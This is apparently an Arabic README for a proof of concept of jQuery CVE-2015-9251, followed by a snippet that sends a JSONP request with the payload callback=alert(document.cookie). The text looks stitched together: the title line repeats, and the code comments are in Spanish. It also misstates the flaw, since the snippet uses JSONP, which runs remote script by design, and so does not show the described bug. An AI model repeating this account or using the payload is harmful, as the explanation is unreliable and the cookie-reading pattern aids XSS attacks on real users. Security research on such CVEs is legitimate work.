
PoC لـ CVE-2015-9251 jQuery أقل من 3.0.0.
PoC لـ CVE-2015-9251 jQuery أصغر من 3.0.0.
يحتوي هذا المستودع على إثبات المفهوم (PoC) لثغرة CVE-2015-9251 في مكتبة jQuery. تسمح الثغرة بهجوم Cross-Site Scripting (XSS) عبر استدعاءات JSONP دون تنظيف، وذلك لأن jQuery يسمح بحقن الكود في معامل callback في الإصدارات الأقدم من 3.0.0.
CVE-2015-9251 تؤثر على إصدارات jQuery الأقدم من 3.0.0. تُستغل الثغرة عن طريق التلاعب بمعامل callback في طلب JSONP، مما قد يسمح بتنفيذ كود JavaScript عشوائي في متصفح الضحية. قد يؤدي ذلك إلى كشف بيانات حساسة، مثل ملفات تعريف الارتباط الخاصة بالجلسة.
لتشغيل PoC، اتبع الخطوات التالية:
<script src="https://code.jquery.com/jquery-1.11.3.min.js"></script>
<script>
// Función que simula una solicitud a un servidor vulnerable
$.ajax({
url: "https://example.com/api?callback=alert(document.cookie)",
dataType: "jsonp", // JSONP permite la ejecución de código en JSONP callbacks
success: function(response) {
console.log(response);
}
});
</script>